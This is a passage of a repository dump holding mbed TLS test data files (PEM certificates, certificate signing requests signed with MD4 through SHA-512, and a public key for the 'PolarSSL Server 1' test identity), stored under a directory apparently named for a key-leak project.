o00wSzAJBgNVHRMEAjAAMB0GA1UdDgQWBBQfdNY/KcF0dEU7BRIsPai9Q1kCpjAf 13 | BgNVHSMEGDAWgBS0WuSls97SUva51aaVD+s+vMf9/zANBgkqhkiG9w0BAQUFAAOC 14 | AQEAvc+WwZUemsJu2IiI2Cp6liA+UAvIx98dQe3kZs2zAoF9VwQbXcYzWQ/BILkj 15 | NImKbPL9x0g2jIDn4ZvGYFywMwIO/d++YbwYiQw42/v7RiMy94zBPnzeHi86dy/0 16 | jpOOJUx3IXRsGLdyjb/1T11klcFqGnARiK+8VYolMPP6afKvLXX7K4kiUpsFQhUp 17 | E5VeM5pV1Mci2ETOJau2cO40FJvI/C9W/wR+GAArMaw2fxG77E3laaa0LAOlexM6 18 | A4KOb5f5cGTM5Ih6tEF5FVq3/9vzNIYMa1FqzacBLZF8zSHYLEimXBdzjBoN4qDU 19 | /WzRyYRBRjAI49mzHX6raleqnw== 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.ext_ku.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDpzCCAo+gAwIBAgIBITANBgkqhkiG9w0BAQsFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTQwNDAxMTQ0NDQzWhcNMjQwMzI5MTQ0NDQzWjA8MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxGjAYBgNVBAMTEVBvbGFyU1NMIFNlcnZlciAxMIIBIjAN 6 | BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqQIfPUBq1VVTi/027oJlLhVhXom/ 7 | uOhFkNvuiBZS0/FDUEeWEllkh2v9K+BG+XO+3c+S4ZFb7Wagb4kpeUWA0INq1UFD 8 | d185fAkER4KwVzlw7aPsFRkeqDMIR8EFQqn9TMO0390GH00QUUBncxMPQPhtgSVf 9 | CrFTxjB+FTms+Vruf5KepgVb5xOXhbUjktnUJAbVCSWJdQfdphqPPwkZvq1lLGTr 10 | lZvc/kFeF6babFtpzAK6FCwWJJxK3M3Q91Jnc/EtoCP9fvQxyi1wyokLBNsupk9w 11 | bp7OvViJ4lNZnm5akmXiiD8MlBmj3eXonZUT7Snbq3AS3FrKaxerUoJUsQIDAQAB 12 | o4G0MIGxMAkGA1UdEwQCMAAwHQYDVR0OBBYEFB901j8pwXR0RTsFEiw9qL1DWQKm 13 | MGMGA1UdIwRcMFqAFLRa5KWz3tJS9rnVppUP6z68x/3/oT+kPTA7MQswCQYDVQQG 14 | EwJOTDERMA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3Qg 15 | Q0GCAQAwCwYDVR0PBAQDAgXgMBMGA1UdJQQMMAoGCCsGAQUFBwMBMA0GCSqGSIb3 16 | DQEBCwUAA4IBAQANtiYR2P6+a7rEtJARIgpurw1URYejATbbp3ZhaHBW603Wyb2+ 17 | KJtm1KPCzoju/qTRt65YYkt+tu1wTzamyrkPxt8bBKmxiWnu5j1HLxdjOz8VW9lf 18 | vTb5egR4dU9eNXni/5QkzrdkMO+ob4puDXY7ytPuGX6YfNVhCkrhBlYDJNE57CkK 19 | vpCNj3+Te8PEkWPAEaUhqCnQk6qvPvpBfc/hqgwzlRMt3u5NkiVOuH72dtr4fOI1 20 | nlAU8D2wuvDVr3X5281ONNEtHU6rXe98vlUzS9QV9lBDdsO9nRYJzv2Nb1cjRIM5 21 | JZl0ILLR2tc6E/W5YXalNp37jfrFii1U9WrJ 22 | -----END CERTIFICATE----- 23 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.key_usage.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIDTzCCAjegAwIBAgIBATANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTEwMjEyMTQ0NDA2WhcNMjEwMjEyMTQ0NDA2WjA8MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxGjAYBgNVBAMTEVBvbGFyU1NMIFNlcnZlciAxMIIBIjAN 6 | BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqQIfPUBq1VVTi/027oJlLhVhXom/ 7 | uOhFkNvuiBZS0/FDUEeWEllkh2v9K+BG+XO+3c+S4ZFb7Wagb4kpeUWA0INq1UFD 8 | d185fAkER4KwVzlw7aPsFRkeqDMIR8EFQqn9TMO0390GH00QUUBncxMPQPhtgSVf 9 | CrFTxjB+FTms+Vruf5KepgVb5xOXhbUjktnUJAbVCSWJdQfdphqPPwkZvq1lLGTr 10 | lZvc/kFeF6babFtpzAK6FCwWJJxK3M3Q91Jnc/EtoCP9fvQxyi1wyokLBNsupk9w 11 | bp7OvViJ4lNZnm5akmXiiD8MlBmj3eXonZUT7Snbq3AS3FrKaxerUoJUsQIDAQAB 12 | o10wWzAJBgNVHRMEAjAAMB0GA1UdDgQWBBQfdNY/KcF0dEU7BRIsPai9Q1kCpjAf 13 | BgNVHSMEGDAWgBS0WuSls97SUva51aaVD+s+vMf9/zAOBgNVHQ8BAQEEBAMCAeAw 14 | DQYJKoZIhvcNAQEFBQADggEBAFd3JxNC2rEz94ProSZcv8NNk3e3Dhfms84qjkCM 15 | YhLyZCZywZ2cj3bXThNGVND81UNgqyzk/MEGfKh5d0EHD8v97H7Zvs/EN814d0UC 16 | /BZWlXqX9XInjxlI3baJrRWvsJJdRxMqub9LGBdhgZAtF1BVF9fk2QrV0GW6VN7a 17 | dGYdRYO80yf+vf5g41A0DIi3dhdLF1H7UPDwfUwkF5QckXw0yqueszcmxvCAnxng 18 | AUKoFS971WWCjCo8lMzOXOjeAwmibihT9XBabVzN1w3gOfSBbpHFi770bWgbKPWu 19 | csFKtvrXGtLVQeKkfI1lIMWWeddvkMWWBIqFrkBBLLOI4+A= 20 | -----END CERTIFICATE----- 21 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.pubkey: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqQIfPUBq1VVTi/027oJl 3 | LhVhXom/uOhFkNvuiBZS0/FDUEeWEllkh2v9K+BG+XO+3c+S4ZFb7Wagb4kpeUWA 4 | 0INq1UFDd185fAkER4KwVzlw7aPsFRkeqDMIR8EFQqn9TMO0390GH00QUUBncxMP 5 | QPhtgSVfCrFTxjB+FTms+Vruf5KepgVb5xOXhbUjktnUJAbVCSWJdQfdphqPPwkZ 6 | vq1lLGTrlZvc/kFeF6babFtpzAK6FCwWJJxK3M3Q91Jnc/EtoCP9fvQxyi1wyokL 7 | BNsupk9wbp7OvViJ4lNZnm5akmXiiD8MlBmj3eXonZUT7Snbq3AS3FrKaxerUoJU 8 | sQIDAQAB 9 | -----END PUBLIC KEY----- 10 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.req.cert_type: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIICpTCCAY0CAQAwPDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRow 3 | GAYDVQQDExFQb2xhclNTTCBTZXJ2ZXIgMTCCASIwDQYJKoZIhvcNAQEBBQADggEP 4 | ADCCAQoCggEBAKkCHz1AatVVU4v9Nu6CZS4VYV6Jv7joRZDb7ogWUtPxQ1BHlhJZ 5 | ZIdr/SvgRvlzvt3PkuGRW+1moG+JKXlFgNCDatVBQ3dfOXwJBEeCsFc5cO2j7BUZ 6 | HqgzCEfBBUKp/UzDtN/dBh9NEFFAZ3MTD0D4bYElXwqxU8YwfhU5rPla7n+SnqYF 7 | W+cTl4W1I5LZ1CQG1QkliXUH3aYajz8JGb6tZSxk65Wb3P5BXhem2mxbacwCuhQs 8 | FiScStzN0PdSZ3PxLaAj/X70McotcMqJCwTbLqZPcG6ezr1YieJTWZ5uWpJl4og/ 9 | DJQZo93l6J2VE+0p26twEtxaymsXq1KCVLECAwEAAaAkMCIGCSqGSIb3DQEJDjEV 10 | MBMwEQYJYIZIAYb4QgEBBAQDAgBAMA0GCSqGSIb3DQEBBQUAA4IBAQB95Pkjpg/N 11 | Jbgl5nZcAk8maGMpUFlrhJS4kGutQKZugNX9v8cfABW905IHYXV1dm6zxVcyeqZM 12 | FiOgbV943fu5JbufoazdYXnnR2/iKMigqX4CzZrK3F5ZzegxkfDIfDrn/shC+rWb 13 | SS5WBVLJ3QNj9vwn3/b66IRbp/ViOwHx7+9JT4K/rLId/ynjYf2T57AsmNd/jptc 14 | Zs19fGgtrUXweWkliEZN2zE47Cc53jkx6+Li4TNs4Bjk5P/aXrCP0fBwgGt2K6YW 15 | dQ/nr0PwIbXzVlgUukSTHkJJfhF4Y/WqcUfOPrRdw+zxOLusJ9nzJBR0FOohcBxM 16 | kPBVna0dze/o 17 | -----END CERTIFICATE REQUEST----- 18 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.req.key_usage: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIICnzCCAYcCAQAwPDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRow 3 | GAYDVQQDExFQb2xhclNTTCBTZXJ2ZXIgMTCCASIwDQYJKoZIhvcNAQEBBQADggEP 4 | ADCCAQoCggEBAKkCHz1AatVVU4v9Nu6CZS4VYV6Jv7joRZDb7ogWUtPxQ1BHlhJZ 5 | ZIdr/SvgRvlzvt3PkuGRW+1moG+JKXlFgNCDatVBQ3dfOXwJBEeCsFc5cO2j7BUZ 6 | HqgzCEfBBUKp/UzDtN/dBh9NEFFAZ3MTD0D4bYElXwqxU8YwfhU5rPla7n+SnqYF 7 | W+cTl4W1I5LZ1CQG1QkliXUH3aYajz8JGb6tZSxk65Wb3P5BXhem2mxbacwCuhQs 8 | FiScStzN0PdSZ3PxLaAj/X70McotcMqJCwTbLqZPcG6ezr1YieJTWZ5uWpJl4og/ 9 | DJQZo93l6J2VE+0p26twEtxaymsXq1KCVLECAwEAAaAeMBwGCSqGSIb3DQEJDjEP 10 | MA0wCwYDVR0PBAQDAgHgMA0GCSqGSIb3DQEBBQUAA4IBAQCj6jCu0wE5OQ1JGQwZ 11 | FNwPqZrvKntSq2yLIbgmGxwlvDLxOzn0KmidSFiKRqh0KXwj9siodlz5C0d9tUqq 12 | 7xUXg+j+wDHqUV8zo42Jke+UmWXFPpnXx/fDFGTITdLSn8ZDxkt31ESLTEVZvPFD 13 | odm+C+zWJtKpyL+9op4KvyBQ1MZ9nWZpwMaK4g4mdtOIsz75gMa74w8ZT7VzhGMY 14 | cZGmafsl7x++GDDtf0oCPgrj9xy+Ovv/GyUBaB+6lweflTfPDTRSoN0meFlP5ynF 15 | vqcBM5JKH2FUQIizfc9o6Z8tKxe9FCov3x8szAuoMRA7bjhVngeQIrEkTcaQBvBY 16 | NalC 17 | -----END CERTIFICATE REQUEST----- 18 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.req.ku-ct: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIICsjCCAZoCAQAwPDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRow 3 | GAYDVQQDExFQb2xhclNTTCBTZXJ2ZXIgMTCCASIwDQYJKoZIhvcNAQEBBQADggEP 4 | ADCCAQoCggEBAKkCHz1AatVVU4v9Nu6CZS4VYV6Jv7joRZDb7ogWUtPxQ1BHlhJZ 5 | ZIdr/SvgRvlzvt3PkuGRW+1moG+JKXlFgNCDatVBQ3dfOXwJBEeCsFc5cO2j7BUZ 6 | HqgzCEfBBUKp/UzDtN/dBh9NEFFAZ3MTD0D4bYElXwqxU8YwfhU5rPla7n+SnqYF 7 | W+cTl4W1I5LZ1CQG1QkliXUH3aYajz8JGb6tZSxk65Wb3P5BXhem2mxbacwCuhQs 8 | FiScStzN0PdSZ3PxLaAj/X70McotcMqJCwTbLqZPcG6ezr1YieJTWZ5uWpJl4og/ 9 | DJQZo93l6J2VE+0p26twEtxaymsXq1KCVLECAwEAAaAxMC8GCSqGSIb3DQEJDjEi 10 | MCAwCwYDVR0PBAQDAgHgMBEGCWCGSAGG+EIBAQQEAwIAQDANBgkqhkiG9w0BAQUF 11 | AAOCAQEANlNG9hW852OzVKj2Z8TtU9jxstAoSCH9yc9Coj4Vw2TTjs1zcuBWsMl1 12 | 2bf2I6ZvEH6ZhcQY7i7nyHQyPlqE4l6U9D8ct967QN7smuAHNY2HiQ2++eCBTHck 13 | PdtGJAzIvNlXcoqNi8UC5fGepNtI1usNo41SKMvbg6nGA5gdcQKk7CVlk8lrD0qI 14 | Xn/HvjSRoDE4ZGxAtNvPXWorGSxtgcy8EMPoXVUab5fNt8q//x/NQ4yEQKPrexmR 15 | IuOiQ8VW8QZtkORGpZbGSvskU0WfKANui4zCcXYRc4mVR4Wf0C+fyHeihhjslSnT 16 | RbC7nQn5HSHp31qJlr80QodywaK1Dg== 17 | -----END CERTIFICATE REQUEST----- 18 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.req.md4: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIICgTCCAWkCAQAwPDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRow 3 | GAYDVQQDExFQb2xhclNTTCBTZXJ2ZXIgMTCCASIwDQYJKoZIhvcNAQEBBQADggEP 4 | ADCCAQoCggEBAKkCHz1AatVVU4v9Nu6CZS4VYV6Jv7joRZDb7ogWUtPxQ1BHlhJZ 5 | ZIdr/SvgRvlzvt3PkuGRW+1moG+JKXlFgNCDatVBQ3dfOXwJBEeCsFc5cO2j7BUZ 6 | HqgzCEfBBUKp/UzDtN/dBh9NEFFAZ3MTD0D4bYElXwqxU8YwfhU5rPla7n+SnqYF 7 | W+cTl4W1I5LZ1CQG1QkliXUH3aYajz8JGb6tZSxk65Wb3P5BXhem2mxbacwCuhQs 8 | FiScStzN0PdSZ3PxLaAj/X70McotcMqJCwTbLqZPcG6ezr1YieJTWZ5uWpJl4og/ 9 | DJQZo93l6J2VE+0p26twEtxaymsXq1KCVLECAwEAAaAAMA0GCSqGSIb3DQEBAwUA 10 | A4IBAQAPPUzYvUA+HQTteMhkGcuD6XtsZ3i2gQdDGgLUxtMAVFw+/5ZS6l+WqPgq 11 | WQIOsEINPHnjUAMz5pjbFdFqu7X5G29THa2da0Ua2bJO/bu3CZ6EksGmclqaQ2Zl 12 | vfkWaI3bfPFh8eKHF+F5oaVp0gHviCakNqxot4rrZdL8pnJC5JJ+f76y6SgHYOao 13 | SGCv1gYURhIsX0gWCqldsCwxJQFEig9HISUcXViGGVnLdshUtuKL9yNZ/HNAOuOk 14 | 7N7a7ur8KMmvar1jkTq+zKSSuSrzmU2JvxFdqU0Gr7A35jgnVG8sj66L4lAcwdoG 15 | sP8OmC1hWh4U3avH6EHdEG8lw0U7 16 | -----END CERTIFICATE REQUEST----- 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.req.md5: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIICgTCCAWkCAQAwPDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRow 3 | GAYDVQQDExFQb2xhclNTTCBTZXJ2ZXIgMTCCASIwDQYJKoZIhvcNAQEBBQADggEP 4 | ADCCAQoCggEBAKkCHz1AatVVU4v9Nu6CZS4VYV6Jv7joRZDb7ogWUtPxQ1BHlhJZ 5 | ZIdr/SvgRvlzvt3PkuGRW+1moG+JKXlFgNCDatVBQ3dfOXwJBEeCsFc5cO2j7BUZ 6 | HqgzCEfBBUKp/UzDtN/dBh9NEFFAZ3MTD0D4bYElXwqxU8YwfhU5rPla7n+SnqYF 7 | W+cTl4W1I5LZ1CQG1QkliXUH3aYajz8JGb6tZSxk65Wb3P5BXhem2mxbacwCuhQs 8 | FiScStzN0PdSZ3PxLaAj/X70McotcMqJCwTbLqZPcG6ezr1YieJTWZ5uWpJl4og/ 9 | DJQZo93l6J2VE+0p26twEtxaymsXq1KCVLECAwEAAaAAMA0GCSqGSIb3DQEBBAUA 10 | A4IBAQAQx+EjsPUUYac3t1v24lPOYqrKM52XYDwSnwW5Okjn+YxJowZyd8gfzmfp 11 | vp4+//h5P3VlQDwaXeMTgKCizjf+jdACNJe60/RxYpYFKrvy67ZSr/h7fhdm52Jz 12 | /tSCbh6FwH1075loBuWLuzD7Pvm1X1FJmbp2ceaJozDnXTAKFdVTqdiRYwyg4iPl 13 | krhONGNe132aYZtFssdjSCim+bB+/sagR3SuJPoQ+8EjDXYG75n4ZVa4dAcjVoYk 14 | pg0YK5cuH1FHCXOBO4N1+G0skL8AZwlv+rhKQk6lpGt+AQ8LSjCz2zHUnfpaXXWp 15 | s1dq9ufjbJdaHDjkBY1gZ3BMmXPw 16 | -----END CERTIFICATE REQUEST----- 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.req.sha1: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIICgTCCAWkCAQAwPDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRow 3 | GAYDVQQDExFQb2xhclNTTCBTZXJ2ZXIgMTCCASIwDQYJKoZIhvcNAQEBBQADggEP 4 | ADCCAQoCggEBAKkCHz1AatVVU4v9Nu6CZS4VYV6Jv7joRZDb7ogWUtPxQ1BHlhJZ 5 | ZIdr/SvgRvlzvt3PkuGRW+1moG+JKXlFgNCDatVBQ3dfOXwJBEeCsFc5cO2j7BUZ 6 | HqgzCEfBBUKp/UzDtN/dBh9NEFFAZ3MTD0D4bYElXwqxU8YwfhU5rPla7n+SnqYF 7 | W+cTl4W1I5LZ1CQG1QkliXUH3aYajz8JGb6tZSxk65Wb3P5BXhem2mxbacwCuhQs 8 | FiScStzN0PdSZ3PxLaAj/X70McotcMqJCwTbLqZPcG6ezr1YieJTWZ5uWpJl4og/ 9 | DJQZo93l6J2VE+0p26twEtxaymsXq1KCVLECAwEAAaAAMA0GCSqGSIb3DQEBBQUA 10 | A4IBAQCACO1GoBxMdGoWLtk0USbZIJkJidvraTyuuVMMvTaRHAseepNZWtbI2VjZ 11 | 8BYFKnY9uSX4uozODi5Tkv2dCSwAFFJs7bsALqpjqfU1kwQSbfLoT8twf7o51Zw8 12 | LAEKW0GpifhI4NJAaIeh5EyfMeXH5RFAz31T95Eat56eLcewDK5nWUdQx/KkkSIb 13 | AFKqPKz8F9KS1tEty5UYmC1QV+q7NG1aOrWcuqvszpyUbsz/u32QH0Lp7E3lXMt1 14 | vyFfAsA6KBLTUmyTVQHz4snQAb5CFNLOrXnHbtjem7ZmhDzE1DS/7o8NK49zuXUW 15 | YUMPRpZDSNUpIBmZs2NBTARSEc04 16 | -----END CERTIFICATE REQUEST----- 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.req.sha224: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIICgTCCAWkCAQAwPDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRow 3 | GAYDVQQDExFQb2xhclNTTCBTZXJ2ZXIgMTCCASIwDQYJKoZIhvcNAQEBBQADggEP 4 | ADCCAQoCggEBAKkCHz1AatVVU4v9Nu6CZS4VYV6Jv7joRZDb7ogWUtPxQ1BHlhJZ 5 | ZIdr/SvgRvlzvt3PkuGRW+1moG+JKXlFgNCDatVBQ3dfOXwJBEeCsFc5cO2j7BUZ 6 | HqgzCEfBBUKp/UzDtN/dBh9NEFFAZ3MTD0D4bYElXwqxU8YwfhU5rPla7n+SnqYF 7 | W+cTl4W1I5LZ1CQG1QkliXUH3aYajz8JGb6tZSxk65Wb3P5BXhem2mxbacwCuhQs 8 | FiScStzN0PdSZ3PxLaAj/X70McotcMqJCwTbLqZPcG6ezr1YieJTWZ5uWpJl4og/ 9 | DJQZo93l6J2VE+0p26twEtxaymsXq1KCVLECAwEAAaAAMA0GCSqGSIb3DQEBDgUA 10 | A4IBAQAed2cYY9P/xJNHBrHDxjeh5uFyDskCvw06Kvy8FJt6G/0ncnfhSpPnevao 11 | UPf2jk07iMIFiaDDKc3yg4H2Uh44+Ud2YdAxHYWttKnvj43XSoWSnmUDEiUqgPAP 12 | C4EmgPEfsxtj+nI5fwIGEvfb3mJ31FJxnSJREcaH8uqyXW4vfF8e0o+9gdM+aTw/ 13 | OJj+dYvepfIpB+1jIq1srr9NLJjKlvHBhQFbIcIgQXJKcw5z04hgjdoSuQckMO5z 14 | 3gVaaHfjCJQT1tDWfjLTCceDoJPskeo7xbDvXnCho+ZLtyMesoCvOEeZLJhDYTlw 15 | H5jw6f9GW8Q9XP+EQcf6ZhtmYLrU 16 | -----END CERTIFICATE REQUEST----- 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.req.sha256: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIICgTCCAWkCAQAwPDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRow 3 | GAYDVQQDExFQb2xhclNTTCBTZXJ2ZXIgMTCCASIwDQYJKoZIhvcNAQEBBQADggEP 4 | ADCCAQoCggEBAKkCHz1AatVVU4v9Nu6CZS4VYV6Jv7joRZDb7ogWUtPxQ1BHlhJZ 5 | ZIdr/SvgRvlzvt3PkuGRW+1moG+JKXlFgNCDatVBQ3dfOXwJBEeCsFc5cO2j7BUZ 6 | HqgzCEfBBUKp/UzDtN/dBh9NEFFAZ3MTD0D4bYElXwqxU8YwfhU5rPla7n+SnqYF 7 | W+cTl4W1I5LZ1CQG1QkliXUH3aYajz8JGb6tZSxk65Wb3P5BXhem2mxbacwCuhQs 8 | FiScStzN0PdSZ3PxLaAj/X70McotcMqJCwTbLqZPcG6ezr1YieJTWZ5uWpJl4og/ 9 | DJQZo93l6J2VE+0p26twEtxaymsXq1KCVLECAwEAAaAAMA0GCSqGSIb3DQEBCwUA 10 | A4IBAQBY/1nnYQ3ThVyeZb1Z2wLYoHZ5rfeJCedyP7N/gjJZjhrMbwioUft2uHpb 11 | +OZQfxRXJTbtj/1wpRMCoUMLWzapS7/xGx3IjoPtl42aM4M+xVYvbLjExL13kUAr 12 | eE4JWcMIbTEPol2zSdX/LuB+m27jEp5VsvM2ty9qOw/T4iKwjFSe6pcYZ2spks19 13 | 3ltgjnaamwqKcN9zUA3IERTsWjr5exKYgfXm2OeeuSP0tHr7Dh+w/2XA9dGcLhrm 14 | TA4P8QjIgSDlyzmhYYmsrioFPuCfdi1uzs8bxmbLXbiCGZ8TDMy5oLqLo1K+j2pF 15 | ox+ATHKxQ/XpRQP+2OTb9sw1kM59 16 | -----END CERTIFICATE REQUEST----- 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.req.sha384: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIICgTCCAWkCAQAwPDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRow 3 | GAYDVQQDExFQb2xhclNTTCBTZXJ2ZXIgMTCCASIwDQYJKoZIhvcNAQEBBQADggEP 4 | ADCCAQoCggEBAKkCHz1AatVVU4v9Nu6CZS4VYV6Jv7joRZDb7ogWUtPxQ1BHlhJZ 5 | ZIdr/SvgRvlzvt3PkuGRW+1moG+JKXlFgNCDatVBQ3dfOXwJBEeCsFc5cO2j7BUZ 6 | HqgzCEfBBUKp/UzDtN/dBh9NEFFAZ3MTD0D4bYElXwqxU8YwfhU5rPla7n+SnqYF 7 | W+cTl4W1I5LZ1CQG1QkliXUH3aYajz8JGb6tZSxk65Wb3P5BXhem2mxbacwCuhQs 8 | FiScStzN0PdSZ3PxLaAj/X70McotcMqJCwTbLqZPcG6ezr1YieJTWZ5uWpJl4og/ 9 | DJQZo93l6J2VE+0p26twEtxaymsXq1KCVLECAwEAAaAAMA0GCSqGSIb3DQEBDAUA 10 | A4IBAQA/XVYxhCWWWExy+O5y/zI1121L5MPjrlLypgP+ZDU8TUq8fusryYAgVATo 11 | njpff6RF9QTKZhouFmgwicEnE6Xuw1LZt4SWskEyISMsTemx3eiY3YSu7uqpMIIh 12 | h5ht1qGxkFZaLG0REIlUWqVTKk9oWLOg6pv+qees00SAn031Vc2C3++ctQONUrko 13 | fc8aAGAi9DvSuFkfjhZkp8Fr4d7buHQPmJiYxRp27K5NbVxrr0GCB3wh7ruGc8Mc 14 | K+PNQvoz425dHK3dHzeoIWD2Ka25mbjglbW1rqAdTkZSYH2QqZTHsKCr0u5iPtSD 15 | gF7K0AMuT2LIeSs1p82n+cLF78fz 16 | -----END CERTIFICATE REQUEST----- 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.req.sha512: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE REQUEST----- 2 | MIICgTCCAWkCAQAwPDELMAkGA1UEBhMCTkwxETAPBgNVBAoTCFBvbGFyU1NMMRow 3 | GAYDVQQDExFQb2xhclNTTCBTZXJ2ZXIgMTCCASIwDQYJKoZIhvcNAQEBBQADggEP 4 | ADCCAQoCggEBAKkCHz1AatVVU4v9Nu6CZS4VYV6Jv7joRZDb7ogWUtPxQ1BHlhJZ 5 | ZIdr/SvgRvlzvt3PkuGRW+1moG+JKXlFgNCDatVBQ3dfOXwJBEeCsFc5cO2j7BUZ 6 | HqgzCEfBBUKp/UzDtN/dBh9NEFFAZ3MTD0D4bYElXwqxU8YwfhU5rPla7n+SnqYF 7 | W+cTl4W1I5LZ1CQG1QkliXUH3aYajz8JGb6tZSxk65Wb3P5BXhem2mxbacwCuhQs 8 | FiScStzN0PdSZ3PxLaAj/X70McotcMqJCwTbLqZPcG6ezr1YieJTWZ5uWpJl4og/ 9 | DJQZo93l6J2VE+0p26twEtxaymsXq1KCVLECAwEAAaAAMA0GCSqGSIb3DQEBDQUA 10 | A4IBAQBH78JrIboWUlOiUzEwxuYkaRBr22DfdSHlNVjnenrTsSsSdfPenfrUbs42 11 | NfzhJtvLBnDMs9olsiyPNKZnROmjl/4Da5ScVBfdA7oSImwdsaL0krAju8lJosy7 12 | ypqNejQQDgjL00HkaVyqjnEWY68enAkaK64suQ4w0pkGmtdZyg0nBiH1VI72PcPR 13 | Fu2wxSkvvYj+BcHVAY/GWRMTHw1mkmsQna7AsZ1MFIF3ycIW5Fom6d0wpB6clJ3M 14 | vNTBc7kZIR1BQyblyU96acesxJURJn5xO9Yf9OSsTbd7Xm5xK6DpQWxFFEgdVtir 15 | hSAqtp54nVnLe4QihmVAlM8zt2ON 16 | -----END CERTIFICATE REQUEST----- 17 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server1.v1.crt: -------------------------------------------------------------------------------- 1 | -----BEGIN CERTIFICATE----- 2 | MIIC9DCCAdygAwIBAAIBATANBgkqhkiG9w0BAQUFADA7MQswCQYDVQQGEwJOTDER 3 | MA8GA1UEChMIUG9sYXJTU0wxGTAXBgNVBAMTEFBvbGFyU1NMIFRlc3QgQ0EwHhcN 4 | MTEwMjEyMTQ0NDA2WhcNMjEwMjEyMTQ0NDA2WjA8MQswCQYDVQQGEwJOTDERMA8G 5 | A1UEChMIUG9sYXJTU0wxGjAYBgNVBAMTEVBvbGFyU1NMIFNlcnZlciAxMIIBIjAN 6 | BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqQIfPUBq1VVTi/027oJlLhVhXom/ 7 | uOhFkNvuiBZS0/FDUEeWEllkh2v9K+BG+XO+3c+S4ZFb7Wagb4kpeUWA0INq1UFD 8 | d185fAkER4KwVzlw7aPsFRkeqDMIR8EFQqn9TMO0390GH00QUUBncxMPQPhtgSVf 9 | CrFTxjB+FTms+Vruf5KepgVb5xOXhbUjktnUJAbVCSWJdQfdphqPPwkZvq1lLGTr 10 | lZvc/kFeF6babFtpzAK6FCwWJJxK3M3Q91Jnc/EtoCP9fvQxyi1wyokLBNsupk9w 11 | bp7OvViJ4lNZnm5akmXiiD8MlBmj3eXonZUT7Snbq3AS3FrKaxerUoJUsQIDAQAB 12 | owIwADANBgkqhkiG9w0BAQUFAAOCAQEAoZVuVi7bIslKgMJhejSFXiO+ICMz1fmK 13 | b0tPN68mRYhI/gsjRT0cmX6GUNrg+U5mcBWhMwHgyvx1CARU4YToKZxcXGNL0DPd 14 | Z1hF8nCrJCZBQvNuWE7s0ufw92xz5ZfuKkVxi94RYR529F6gzgl4rpX8UQVu2ym/ 15 | 9pTlHKr4MKi9LNppyJMS89uRcb2FJFMdhAKbhNtbIjI9qGZ7x//0belAaWhq389u 16 | 6XWFnZt35PU6Zz6YbAQ5pjZYsTaohuufgrpOlFPUuc4uR+RfGHIQ6id12lZaQC2m 17 | OFIBDcU0x1cFfPfMgVdBLf6klPt/v/tD77mwx0eztSp28NIf+ACw8A== 18 | -----END CERTIFICATE----- 19 | -------------------------------------------------------------------------------- /mbedtls-key-leak/mbedtls/tests/data_files/server2-badsign.crt: 